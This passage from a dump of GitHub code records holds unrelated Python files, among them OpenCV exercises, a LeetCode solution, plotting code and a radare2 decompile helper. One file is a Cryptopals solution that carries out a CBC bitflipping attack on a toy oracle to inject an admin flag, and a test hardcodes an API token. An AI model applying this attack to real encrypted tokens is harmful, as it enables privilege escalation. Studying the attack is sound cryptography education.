","repo_name":"anon-subm/PERIS","sub_path":"dataloaders/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":20657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72228909034","text":"import argparse\nimport torch\n\nparser = argparse.ArgumentParser(\"Average model parameters\")\nparser.add_argument(\"--model_list\", required=True, help=\"list of model to be averaged\")\nparser.add_argument(\"--output_file\", required=True, help=\"output model file\")\nargs = parser.parse_args()\n\nmodel_list = args.model_list\noutput_file = args.output_file\n\nwith open(model_list, 'r') as f:\n model_files = [line.strip() for line in f.readlines()]\ncount = len(model_files)\n\nstate_dict = {}\nfor i, model_file in enumerate(model_files):\n model_dict = torch.load(model_file, map_location='cpu')\n for key, param in model_dict.items():\n if i == 0:\n state_dict[key] = param\n else:\n assert key in state_dict\n state_dict[key] += param\nfor k in state_dict.keys():\n if state_dict[k] is not None:\n state_dict[k] = torch.true_divide(state_dict[k], count)\ntorch.save(state_dict, output_file)\n","repo_name":"tencent-ailab/3m-asr","sub_path":"tools/average_model.py","file_name":"average_model.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"72"} +{"seq_id":"20663244975","text":"def run() -> int:\n sum_of_the_squares = sum(i ** 2 for i in range(1, 101))\n square_of_the_sum = sum(j for j in range(1, 101)) ** 2\n return square_of_the_sum - sum_of_the_squares\n\n\nif __name__ == \"__main__\":\n from timeit import default_timer as timer\n\n start = timer()\n print(\"Solution:\", run())\n print(\"Duration:\", timer() - start)\n","repo_name":"gregorgabrovsek/ProjectEuler","sub_path":"Problem006.py","file_name":"Problem006.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5154735929","text":"from qtstrap import *\nfrom .constants import *\nimport pyqtgraph as pg\nimport numpy as np\n\n\nclass DataSelector(QWidget):\n selectionChanged = Signal()\n\n def __init__(self, name='', parent=None):\n super().__init__(parent=parent)\n self.name = name\n\n changed = self.selectionChanged\n \n self.on = PersistentCheckBox(f'{name}_on', changed=changed)\n self.points = PersistentCheckBox(f'{name}_points', changed=changed)\n self.line = PersistentCheckBox(f'{name}_line', changed=changed)\n self.freqs = PersistentListWidget(f'{name}_freqs', items=['none']+freqs, default=['none'], selectionMode=QAbstractItemView.ExtendedSelection, changed=changed)\n field_names = [data_field_names[f] for f in data_fields]\n self.x = PersistentComboBox(f'{name}_x', items=field_names, changed=changed)\n self.y = PersistentComboBox(f'{name}_y', items=field_names, changed=changed)\n\n with CVBoxLayout(self) as layout:\n with layout.hbox():\n layout.add(QLabel(name))\n layout.add(QLabel(), 1)\n layout.add(QLabel('Pts:'))\n layout.add(self.points)\n layout.add(QLabel('Line:'))\n layout.add(self.line)\n layout.add(QLabel('On:'))\n layout.add(self.on)\n\n with layout.hbox():\n layout.add(QLabel('X:'))\n layout.add(self.x, 1)\n\n with layout.hbox():\n layout.add(QLabel('Y:'))\n layout.add(self.y, 1)\n\n def get_params(self):\n if self.on.checkState() and self.x.currentText() != self.y.currentText():\n return {\n 'x': data_field_names.inverse[self.x.currentText()][0], \n 'y': data_field_names.inverse[self.y.currentText()][0], \n 'on': self.on.checkState(), \n 'points': self.points.checkState(), \n 'line': self.line.checkState(), \n 'freqs': self.freqs.selected_items(),\n }\n return\n\n\nclass GraphTab(QWidget):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n \n self.plot_layout = pg.GraphicsLayoutWidget()\n self.custom_plots = [DataSelector(f'Custom Plot {i}', self) for i in range(1, 5)]\n\n def normalize(x):\n x = np.asarray(x)\n return (x - x.min()) / (np.ptp(x))\n\n self.freq_colors = dict(zip(freqs, normalize([float(f) for f in freqs])))\n\n self.freqs = PersistentListWidget(\n 'graph_freqs', items=freqs, selectionMode=QAbstractItemView.ExtendedSelection, changed=self.draw_plots)\n self.freq_tabs = PersistentTabWidget('graph_tabs')\n self.freq_tabs.addTab(self.freqs, 'all')\n for plot in self.custom_plots:\n self.freq_tabs.addTab(plot.freqs, plot.name[11:])\n self.freq_tabs.restore_state()\n\n self.fwd_v = PersistentCheckBox('graph_fwd_v', changed=self.draw_plots)\n self.fwd_w = PersistentCheckBox('graph_fwd_w', changed=self.draw_plots)\n\n with CHBoxLayout(self) as layout:\n with layout.vbox():\n layout.add(QLabel('Reference Plots:'))\n with layout.hbox():\n layout.add(QLabel('Forward Volts:'))\n layout.add(self.fwd_v)\n with layout.hbox():\n layout.add(QLabel('Forward Watts:'))\n layout.add(self.fwd_w)\n layout.add(HLine())\n layout.add(QLabel('Custom Plot Freqs:'))\n layout.add(self.freq_tabs, 1)\n layout.add(self.custom_plots)\n layout.add(self.plot_layout, 1)\n\n self.data = {}\n\n for plot in self.custom_plots:\n plot.selectionChanged.connect(self.draw_plots)\n\n def get_color_map(self, freqs):\n x = np.asarray([float(f) for f in freqs])\n lower = x.min()\n upper = x.max()\n normals = (x - lower) / (upper - lower)\n\n return dict(zip(freqs, normals))\n\n def poly_to_points(self, x1, poly):\n x2 = range(int(max(x1)))\n y2 = [poly(p) for p in x2]\n return x2, y2\n\n def add_forward_volts_plot(self):\n title = 'Forward Volts'\n labels = {'bottom':'Meter: Forward Watts', 'left':'Target: Forward Volts'}\n plot = self.plot_layout.addPlot(title=title, labels=labels)\n self.plot_added()\n plot.showGrid(x=True, y=True)\n plot.showButtons()\n plot.addLegend()\n\n colors = self.get_color_map(freqs)\n for freq in freqs:\n points = [p for p in self.data if p['freq'] == freq]\n x = [p['m_fwd'] for p in points]\n y = [p['t_fwd_volts'] for p in points]\n\n poly = np.poly1d(np.polyfit(x, y, 2))\n x2, y2 = self.poly_to_points(x, poly)\n\n plot.plot(x2, y2, pen=pg.hsvColor(colors[freq]), name=freq)\n plot.plot(x, y, pen=None, symbol='o', symbolSize=3, symbolPen=pg.hsvColor(colors[freq]))\n\n def add_forward_watts_plot(self):\n title = 'Forward Watts with Reference Line'\n labels = {'bottom':'Meter: Forward Watts', 'left':'Target: Forward Watts'}\n plot = self.plot_layout.addPlot(title=title, labels=labels)\n self.plot_added()\n plot.showGrid(x=True, y=True)\n plot.showButtons()\n plot.addLegend()\n\n reference_points = list(range(0, 210, 10))\n plot.plot(reference_points, reference_points, pen='w')\n \n colors = self.get_color_map(freqs)\n for freq in freqs:\n points = [p for p in self.data if p['freq'] == freq]\n x = [p['m_fwd'] for p in points]\n y = [p['t_fwd_watts'] for p in points]\n\n poly = np.poly1d(np.polyfit(x, y, 2))\n x2, y2 = self.poly_to_points(x, poly)\n\n plot.plot(x2, y2, pen=pg.hsvColor(colors[freq]), name=freq)\n plot.plot(x, y, pen=None, symbol='o', symbolSize=3, symbolPen=pg.hsvColor(colors[freq]))\n\n def add_custom_plot(self, params):\n title = 'Custom Plot'\n labels = {'bottom':data_field_names[params['x']], 'left':data_field_names[params['y']]}\n plot = self.plot_layout.addPlot(title=title, labels=labels)\n plot.showGrid(x=True, y=True)\n plot.showButtons()\n plot.addLegend()\n\n self.plot_added()\n\n plot_freqs = params['freqs']\n if 'none' in params['freqs']:\n plot_freqs = freqs\n colors = self.get_color_map(plot_freqs)\n\n for freq in plot_freqs:\n points = [p for p in self.data if p['freq'] == freq]\n x = [p[params['x']] for p in points]\n y = [p[params['y']] for p in points]\n\n name = freq\n if params['line']:\n poly = np.poly1d(np.polyfit(x, y, 2))\n x2, y2 = self.poly_to_points(x, poly)\n\n plot.plot(x2, y2, pen=pg.hsvColor(colors[freq]), name=name)\n name = None\n if params['points']:\n plot.plot(x, y, pen=None, symbol='o', symbolSize=3, symbolPen=pg.hsvColor(colors[freq]), name=name)\n name = None\n\n def reset_plot(self):\n self.plot_layout.clear()\n self.number_of_plots = 0\n\n def plot_added(self):\n self.number_of_plots += 1\n if self.number_of_plots % 2 == 0:\n self.plot_layout.nextRow()\n\n def draw_plots(self):\n freqs = self.freqs.selected_items()\n plot_params = [plot.get_params() for plot in self.custom_plots]\n self.reset_plot()\n \n if self.fwd_v.isChecked():\n self.add_forward_volts_plot()\n if self.fwd_w.isChecked():\n self.add_forward_watts_plot()\n\n for params in plot_params:\n if params is None:\n continue\n\n self.add_custom_plot(params)\n\n def set_data(self, data):\n self.data = data\n self.draw_plots()","repo_name":"DaelonSuzuka/DeviceManager","sub_path":"src/plugins/apps/calibration/graph_tab.py","file_name":"graph_tab.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18165878657","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 10 18:39:51 2017\r\n\r\n@author: Sanju Menon\r\n\r\n*** hug -f sometests.py --manual_reload ***\r\n*** \r\nTF_IDF_Intent\r\nAmbiguousTable\r\nTable\r\npayroll_entity_extraction\r\nLocationExtraction\r\n\r\nexample-mesg.docx\r\npayroll_intent_example\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nfrom IntentWithPayload import get_intent_payload\r\n\r\n\r\n\r\nimport hug\r\n\r\n \r\n@hug.cli()\r\n@hug.get()\r\n@hug.local()\r\ndef test(text: str):\r\n \r\n response = get_intent_payload(text)\r\n print(response)\r\n return {'response': response} \r\n\r\n\r\nif __name__ == '__main__':\r\n text = 'Meal Allowance \\n\\n Emp id: 052 – BTBPM1234X \\n\\t060 - GLXPS8254F'\r\n test(text)\r\n\r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"rosnet/payrollNLU","sub_path":"sometests.py","file_name":"sometests.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22787825807","text":"from collections import defaultdict\r\n\r\nclass Solution:\r\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\r\n # Time: O(?)\r\n # Space: O(?)\r\n \r\n def arrive(current, end):\r\n # Prevent loop\r\n if current in seen:\r\n return\r\n seen.add(current)\r\n \r\n # Check if we've reached the goal\r\n if current == end:\r\n return True\r\n \r\n # Continue DFS\r\n for nextNode in adj[current]:\r\n if arrive(nextNode, end):\r\n return True\r\n \r\n # Relax edge\r\n seen.remove(current)\r\n \r\n # Initialize our adjacency list\r\n adj = defaultdict(list)\r\n \r\n # Keep building our graph up edge by edge, return the one that causes redundancy\r\n seen = set()\r\n \r\n for n1, n2 in edges:\r\n # If we arrive at n2, that means there's already a path connected - rendering this current edge redundant\r\n if arrive(n1, n2):\r\n return [n1, n2]\r\n \r\n # Safe to connect edge\r\n adj[n1].append(n2)\r\n adj[n2].append(n1)\r\n \r\n return","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Medium/0684-Redundant-Connection.py","file_name":"0684-Redundant-Connection.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33311824131","text":"import os\nimport random\n\nfrom wrappers import MLMModelWrapper, MODEL_MAPPING\n\nimport sys\n\nimport torch\nfrom absl import app\nimport numpy as np\n\nfrom config import FLAGS\nfrom pathlib import Path\n\nfrom text_input_pipeline import GutenbergReader\nfrom my_utils.util import get_gpus_with_enough_memory\n\nFIXED_DEVICE_IDXS = None #[0]\n# CHOSEN_RUN_DIR = Path('output','constant','same')\nCHOSEN_RUN_DIR = Path('output','huggingface_baseline_encoder','no_pretrain')\n\n#TODO bring this up-to-date if gonna use\ndef main(_):\n FLAGS.device_idxs = get_gpus_with_enough_memory(\n 8000) if not FIXED_DEVICE_IDXS else FIXED_DEVICE_IDXS # Hack to not use flagvalue of og model when pertaining to GPU usage\n reader = GutenbergReader()\n data_dict = reader.get_data_dict()\n train_dataset, test_dataset, val_dataset, vocab = (data_dict[key] for key in\n ('train', 'test', 'val', 'vocab'))\n model = MLMModelWrapper(MODEL_MAPPING[FLAGS.model], vocab)\n model_device = f'cuda:{FLAGS.device_idxs[0]}' if len(FLAGS.device_idxs) != 0 else 'cpu'\n model = model.cuda(model_device)\n\n best_val_run_path = Path(latest_run_dir, 'best.th')\n model_states = [Path(latest_run_dir, m) for m in os.listdir(latest_run_dir) if 'model_state_epoch_' in m]\n latest_run_path = max(model_states, key=os.path.getmtime)\n\n for trained_model_path in (best_val_run_path, latest_run_path):\n print(f'Testing {trained_model_path}')\n model.load_state_dict(torch.load(trained_model_path,map_location=torch.device(model_device)))\n model = model.cuda(model_device)\n model.eval() # Set to eval mode\n for name, dataset in zip(('Train', 'Test', 'Val'), (train_dataset, test_dataset, val_dataset)):\n print(f'Testing {name}')\n instances = random.sample(dataset, 1)\n predictions = model.forward_on_instances(\n instances)\n input_texts = [tokens_to_mask_aware_text(model.token_indexer,\n model.token_indexer.convert_ids_to_tokens(\n instances[batch_sample].fields['input_ids'].array),\n predictions[batch_sample]['mask'])\n for batch_sample in range(len(predictions))]\n input_ids = torch.cat([instance.as_tensor_dict()['input_ids'][None,:] for instance in instances]).numpy()\n prediction_ids = np.vstack([pred['vocab_scores'].argmax(1)[None,:] for pred in predictions])\n mask = np.vstack([predictions[batch_sample]['mask'] for batch_sample in range(len(predictions))])\n filled_in_predictions = np.where(mask,\n prediction_ids,\n input_ids)\n predicted_texts = [tokens_to_mask_aware_text(model.token_indexer,\n model.token_indexer.convert_ids_to_tokens(\n predictions[batch_sample]['vocab_scores'].argmax(1)),\n predictions[batch_sample]['mask'])\n for batch_sample in range(len(predictions))]\n\n filled_in_predicted_texts = [tokens_to_mask_aware_text(model.token_indexer,\n model.token_indexer.convert_ids_to_tokens(\n filled_in_predictions[batch_sample]),\n predictions[batch_sample]['mask'])\n for batch_sample in range(len(predictions))]\n for input_text, predicted_text, filled_in_predicted_text in zip(input_texts, predicted_texts, filled_in_predicted_texts):\n print(f'Input: {input_text}')\n print(f'Filled in Prediction: {filled_in_predicted_text}')\n print(f'All output: {predicted_text}')\n print(' ')\n\n\n# Copied from HF transformers\ndef tokens_to_mask_aware_text(tokenizer, filtered_tokens, mask,\n skip_special_tokens=False, clean_up_tokenization_spaces=True):\n # To avoid mixing byte-level and unicode for byte-level BPT\n # we need to build string separately for added tokens and byte-level tokens\n # cf. https://github.com/huggingface/transformers/issues/1133\n sub_texts = []\n current_sub_text = []\n for token, isMasked in zip(filtered_tokens, mask):\n if skip_special_tokens and token in tokenizer.all_special_ids:\n continue\n if token in tokenizer.added_tokens_encoder:\n if current_sub_text:\n sub_texts.append(tokenizer.convert_tokens_to_string(current_sub_text))\n current_sub_text = []\n sub_texts.append(token)\n else:\n if isMasked:\n current_sub_text.append(tokenizer.mask_token)\n current_sub_text.append(token)\n current_sub_text.append(tokenizer.mask_token)\n else:\n current_sub_text.append(token)\n if current_sub_text:\n sub_texts.append(tokenizer.convert_tokens_to_string(\n current_sub_text))\n text = \" \".join(sub_texts)\n\n if clean_up_tokenization_spaces:\n clean_text = tokenizer.clean_up_tokenization(text)\n return clean_text\n else:\n return text\n\n\nif __name__ == '__main__':\n all_runs = [Path('.', 'output', model_dir, run)\n for model_dir in os.listdir(Path('.', 'output')) for run in os.listdir(Path('.', 'output', model_dir))\n if os.path.isdir(Path('.', 'output', model_dir)) and os.path.isdir(Path('.', 'output', model_dir, run))]\n latest_run_dir = max(all_runs, key=os.path.getmtime) if not CHOSEN_RUN_DIR else CHOSEN_RUN_DIR\n flagfile = Path(latest_run_dir, 'flagfile.txt')\n app.run(main, sys.argv + [f'--flagfile={flagfile}'])\n","repo_name":"Natithan/DIRT","sub_path":"src/check_predictions_qualitative.py","file_name":"check_predictions_qualitative.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22636704202","text":"import cv2\nimport numpy as np\n\n######### ex-01 ############\n# 검은색 사각형 안에 흰색 사각형\n# image_rectangle = np.ones((400,400), dtype='uint8') # 검은색 정사각형 생성\n# cv2.rectangle(image_rectangle, (50,50),(300,300),(255,255,255), -1) # 안에 들어갈 흰색 사각형\n# cv2.imshow(\"image show\", image_rectangle)\n# cv2.waitKey(0)\n\n\n######### ex-02 ############\n# 검은색 사각형 안에 흰색 원\n# img_circle = np.ones((400,400), dtype='uint8')\n# cv2.circle(img_circle, (300,300), 70, (255,255,255), -1)\n# cv2.imshow(\"image show\", img_circle)\n# cv2.waitKey(0)\n\n######### ex-03 ############\n#### 비트 연산에 대해 알아보자.(합,교집합으로 쉽게 이해)\n# 위에 2줄씩 가져옴.\nimg_rectangle = np.ones((400,400), dtype='uint8')\ncv2.rectangle(img_rectangle, (50,50),(300,300),(255,255,255), -1) \nimg_circle = np.ones((400,400), dtype='uint8')\ncv2.circle(img_circle, (300,300), 70, (255,255,255), -1)\n\n\n### AND\n# bitwiseAnd = cv2.bitwise_and(img_rectangle, img_circle)\n# cv2.imshow(\"image bitwiseAnd\", bitwiseAnd)\n# cv2.waitKey(0)\n\n### OR\n# bitwiseOr = cv2.bitwise_or(img_rectangle, img_circle)\n# cv2.imshow(\"image bitwiseOr\", bitwiseOr)\n# cv2.waitKey(0)\n\n### XOR (교집합)\n# bitwiseXor = cv2.bitwise_xor(img_rectangle, img_circle)\n# cv2.imshow(\"image bitwiseXor\", bitwiseXor)\n# cv2.waitKey(0)\n\n### NOT\n# rectangle기준\n# bitwiseNot = cv2.bitwise_not(img_rectangle)\n# cv2.imshow(\"rectangle Not\", bitwiseNot)\n# cv2.waitKey(0)\n\n\n# circle기준\n# bitwiseNot = cv2.bitwise_not(img_circle)\n# cv2.imshow(\"circle Not\", bitwiseNot)\n# cv2.waitKey(0)\n\n\n######### ex-04 마스킹 ############\nmask = np.zeros((683,1024,3), dtype='uint8') # 683, 1024뒤에 3 안붙이면 흑백만 나옴(컬러가 안된다고 함.)\ncv2.rectangle(mask, (60,50), (280,280), (255,255,255), -1)\ncv2.rectangle(mask, (420,50), (550,230), (255,255,255), -1)\ncv2.rectangle(mask, (750,50), (920,280), (255,255,255), -1) \ncv2.imshow('....', mask)\ncv2.waitKey(0)\n\n#################### 과제 ##########################\n# img = cv2.imread('./face.png')\n# print(img.shape)\n# mask = np.zeros_like(img)\n# # mask = np.zeros((300,332), dtype='uint8')\n# # cv2.rectangle(mask, (60,50), (280,280), (255,255,255), -1)\n# # cv2.rectangle(mask, (420,50), (550,230), (255,255,255), -1)\n# # cv2.rectangle(mask, (750,50), (920,280), (255,255,255), -1)\n# masked = cv2.bitwise_and(img, mask)\n# cv2.imshow('....', masked)\n# cv2.waitKey(0)","repo_name":"Byunggu-Son/MS_AI_School","sub_path":"이미지 다루기 및 데이터셋 구축/DAY47-22_12_08_image preprocessing & OpenCV/ex_02.py","file_name":"ex_02.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16781265632","text":"#!/usr/bin/env python3\n\nimport cryptolib\n\n## SECRET DATA\nPREF = b'comment1=cooking%20MCs;userdata='\nSUFF = b';comment2=%20like%20a%20pound%20of%20bacon'\nBS = 16\nIV = cryptolib.randbin(BS)\nKey = cryptolib.randbin(BS)\n##\n\ndef encrypt(userdata: str) -> bytes:\n # NB1: The statement is unclear about \"quoting out\" ';' and '=' from the whole\n # data or only from the userdata part. We consider here that it makes more\n # sense to only apply this to the userdata. This does not change anything\n # to the attack anyway...\n # NB2: We encode the data here. Otherwise, it would simply be possible to\n # inject arbitrary data and to build an arbitrary CBC encrypted message\n # block-by-block past the prefix (no need for the bitflipping attack).\n userdata = userdata.replace(';','\";\"').replace('=','\"=\"').encode()\n data = PREF + userdata + SUFF\n return cryptolib.AES_CBC_encrypt(Key, IV, cryptolib.pad(data, BS))\n\nTARGET = b';admin=true;'\ndef decrypt(ciph: bytes) -> bool:\n data = cryptolib.unpad(cryptolib.AES_CBC_decrypt(Key, IV, ciph), BS)\n # NB: The attack would not work if we had decoded the data here (as the\n # modified encrypted block will be decrypted to seemingly random data).\n print(data)\n return TARGET in data\n\nif __name__=='__main__':\n assert not decrypt(encrypt(TARGET.decode()))\n # We have seen in previous challenges how to detect:\n # - ECB/CBC mode\n # - the block size BS\n # - the size of the prefix and suffix data\n # hence, to focus on the attack, we assume here that\n # we already know it is CBC, BS and the prefix size.\n PREF_SIZE = len(PREF)\n target = bytearray(TARGET)\n # we flip the parity bit of the filtered bytes of the target\n flips = [i for i,c in enumerate(target) if c in b';=']\n for b in flips:\n target[b] ^= 1\n target = target.decode()\n # we inject the userdata\n r = (-PREF_SIZE)%BS\n ciph = encrypt('0'*r + target)\n # and flip the corresponding bits in the previous block\n off = ((PREF_SIZE-1)//BS)*BS\n ciph = bytearray(ciph)\n for b in flips:\n ciph[off+b] ^= 1\n # this block will be decrypted to seemingly random data\n # the the next one will be corrected to the target\n assert decrypt(ciph)\n","repo_name":"blegloannec/cryptopals","sub_path":"2/2.16.py","file_name":"2.16.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15384211147","text":"import openai\nimport r2pipe\nimport sys\nimport os\n\nopenai.api_key = os.environ['OPENAI_API_KEY']\n\ndef createR2Pipe():\n try:\n pipe = r2pipe.open()\n pipe.cmd('a')\n return pipe\n except:\n print('Unexpected error')\n return None\n\n\ndef askGPT(func: str) -> str:\n resp = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"user\", \"content\": \"How does this function work\"},\n {\"role\": \"user\", \"content\": func}\n ]\n )\n\n return resp['choices'][0]['message']['content']\n\n\ndef decompile(func: str, pipe) -> str:\n return pipe.cmd(f'pdg @{func}')\n\n\ndef main(func):\n pipe = createR2Pipe()\n dec = decompile(func, pipe)\n\n resp = askGPT(dec)\n print(resp)\n\nif __name__ == '__main__':\n argv = sys.argv\n if len(argv) != 2:\n print(f'Usage: {argv[0]} function (addr|name)')\n exit(1)\n func = sys.argv[1]\n main(func)\n","repo_name":"n01e0/r2gpt","sub_path":"r2gpt.py","file_name":"r2gpt.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73231415573","text":"\"\"\"\n* Assignment: Loop For Text\n* Required: no\n* Complexity: medium\n* Lines of code: 14 lines\n* Time: 13 min\n\nEnglish:\n 1. Given is text of the \"Moon Speech\" by John F. Kennedy's [1]\n 2. Sentences are separated by period (`.`)\n 3. Clean each sentence from whitespaces at the beginning and at the end\n 4. Words are separated by spaces\n 5. Print the total number in whole text:\n a. adverbs (words ending with \"ly\")\n b. sentences\n c. words\n d. letters\n e. characters (including spaces inside sentences, but not comas `,`)\n f. comas (`,`)\n 6. Run doctests - all must succeed\n\nPolish:\n 1. Dany jest tekst przemówienia \"Moon Speech\" wygłoszonej\n przez John F. Kennedy'ego [1]\n 2. Zdania oddzielone są kropkami (`.`)\n 3. Każde zdanie oczyść z białych znaków na początku i końcu\n 4. Słowa oddzielone są spacjami\n 5. Wypisz także ile jest łącznie w całym tekście:\n a. przysłówków (słów zakończonych na \"ly\")\n b. zdań\n c. słów\n d. liter\n e. znaków (łącznie ze spacjami wewnątrz zdań, ale bez przecinków `,`)\n f. przecinków (`,`)\n 6. Uruchom doctesty - wszystkie muszą się powieść\n\nReferences:\n [1] Kennedy, J.F. Moon Speech - Rice Stadium.\n Year: 1962.\n Retrieved: 2021-03-06.\n URL: http://er.jsc.nasa.gov/seh/ricetalk.htm\n\nTests:\n >>> import sys; sys.tracebacklimit = 0\n\n >>> assert result is not Ellipsis, \\\n 'Assign your result to variable `result`'\n >>> assert type(result) is dict, \\\n 'Variable `result` has invalid type, should be dict'\n\n >>> print(result) # doctest: +NORMALIZE_WHITESPACE\n {'sentences': 7,\n 'words': 71,\n 'characters': 347,\n 'letters': 283,\n 'commas': 1,\n 'adverbs': 0}\n\"\"\"\n\nTEXT = \"\"\"\n We choose to go to the Moon.\n We choose to go to the Moon in this decade and do the other things.\n Not because they are easy, but because they are hard.\n Because that goal will serve to organize and measure the best of our energies and skills.\n Because that challenge is one that we are willing to accept.\n One we are unwilling to postpone.\n And one we intend to win\n\"\"\"\n\n# Number of occurrences of each grammar object\n# type: dict[str,int]\nresult = {\n 'sentences': 0,\n 'words': 0,\n 'characters': 0,\n 'letters': 0,\n 'commas': 0,\n 'adverbs': 0,\n}\n\n# Solution\nfor sentence in TEXT.split('.'):\n sentence = sentence.strip()\n words = sentence.split()\n letters = sentence.replace(',', '').replace(' ', '')\n characters = sentence.replace(',', '')\n comas = sentence.count(',')\n\n result['sentences'] += 1\n result['words'] += len(words)\n result['letters'] += len(letters)\n result['characters'] += len(characters)\n result['commas'] += comas\n\n for word in words:\n if word.endswith('ly'):\n result['adverbs'] += 1\n","repo_name":"astromatt/python3.info","sub_path":"basics/loop/assignments/loop_nested_c.py","file_name":"loop_nested_c.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"67"} +{"seq_id":"26144924001","text":"import requests\n\n\nclass TestCourses:\n # Just for TokenAuthentication - Change in settings project\n # https://www.django-rest-framework.org/api-guide/authentication/#tokenauthentication\n headers = {'Authorization': 'Token 51caba258784f54c952f193d8df916b71d3b911c'}\n baseURL = 'http://localhost:8000/api/courses/'\n\n def test_get_courses(self):\n response = requests.get(url=self.baseURL, headers=self.headers)\n\n assert response.status_code == 200\n\n def test_get_course(self):\n response = requests.get(url=f'{self.baseURL}4')\n\n assert response.status_code == 200\n\n def test_post_course(self):\n data = {\n \"title\": \"Curso teste22\",\n \"url\": \"http://cursoteste22.com\"\n }\n response = requests.post(url=self.baseURL, headers=self.headers, data=data)\n\n assert response.status_code == 201\n assert response.json()['title'] == data['title']\n\n def test_put_course(self):\n data = {\n \"title\": \"test updated course\",\n \"url\": \"testupdated.com.br\"\n }\n response = requests.put(url=self.baseURL, headers=self.headers, data=data)\n\n assert response.status_code == 200\n assert response.json()['title'] == data['title']\n\n def test_delete_course(self):\n response = requests.delete(url=self.baseURL, headers=self.headers)\n\n assert response.status_code == 204 and len(response.text) == 0\n","repo_name":"isaias0rt0n/school-api","sub_path":"test_pytest.py","file_name":"test_pytest.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24057828321","text":"from yandex_music import Client\nfrom yandex_music.exceptions import UnauthorizedError\nimport time\nimport vlc\nimport os\nimport sys\nimport random\n\n\nclear = lambda: os.system('cls')\n\ndef getClient():\n try:\n with open ('token.txt') as file:\n token = file.readline()\n\n client = Client(token).init()\n print('Success Authorization.')\n except UnauthorizedError:\n print('Your OAuth token is likely expired')\n sys.exit()\n except:\n print(\"Can't read \\\"token.txt\\\"\")\n sys.exit()\n\n return client\n\n\nclient = getClient()\nuserPlaylist = client.users_likes_tracks()\ntracks = len(userPlaylist.tracks)\ntracks = list(range(tracks))\nrandom.shuffle(tracks)\n\ntrackIndex = 0\n\nsongs = [{'name': '', 'track': userPlaylist[tracks[trackIndex]].fetch_track()},\n {'name': '', 'track': None}]\n\nwhile not(songs[0]['track'].available):\n trackIndex += 1\n songs[0]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n\n if trackIndex >= len(tracks):\n print(\"All track unavailable.\")\n input('Press to exit')\n sys.exit()\n\n\nclear()\nprint('Downloading...')\nsongs[0]['track'].download('song0.mp3')\nname = ''\nfor artist in songs[0]['track'].artists:\n name += (artist.name + ', ')\nname = name[0:-2]\n \nsongs[0]['name'] = f\"{name} - {songs[0]['track'].title}\"\n\nqueue = 0\nwhile True:\n clear()\n print(songs[queue]['name'])\n player = vlc.MediaPlayer('song'+ str(queue) +'.mp3')\n player.play()\n \n queue = (queue + 1) % 2\n trackIndex += 1\n\n songs[queue]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n while not(songs[queue]['track'].available):\n trackIndex += 1\n songs[queue]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n\n if trackIndex >= len(tracks):\n trackIndex = 0\n songs[queue]['track'] = userPlaylist[tracks[trackIndex]].fetch_track()\n\n songs[queue]['track'].download('song'+ str(queue) +'.mp3')\n \n name = ''\n for artist in songs[queue]['track'].artists:\n name += (artist.name + ', ')\n name = name[0:-2]\n \n songs[queue]['name'] = f\"{name} - {songs[queue]['track'].title}\"\n\n length = player.get_length()\n\n while not(length):\n time.sleep(1)\n length = player.get_length()\n\n position = player.get_position()\n time.sleep((1 - position) * length / 1000)","repo_name":"John-Nerevarine/training-projects","sub_path":"yndx-msc/yndxMsc.py","file_name":"yndxMsc.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13942610556","text":"from mrjob.job import MRJob\n\nclass MRUsuariosPeliculasPro(MRJob):\n\n def mapper (self, _, line):\n fields = line.split(',') \n\n pelicula = fields[1]\n rating = float(fields[2])\n\n yield pelicula, (1, rating)\n\n def reducer (self, pelicula, valores):\n usuarios_totales = 0\n rating_total = 0\n\n for value in valores:\n usuarios_totales += value[0]\n rating_total += value[1]\n \n average_rating = rating_total / usuarios_totales\n yield pelicula, (usuarios_totales, average_rating)\n \nif __name__ == '__main__':\n MRUsuariosPeliculasPro.run()","repo_name":"mpocampod/Reto","sub_path":"retoCodigos/peliculas/usuarios_peliculas.py","file_name":"usuarios_peliculas.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12255246259","text":"from logging import getLogger\nfrom 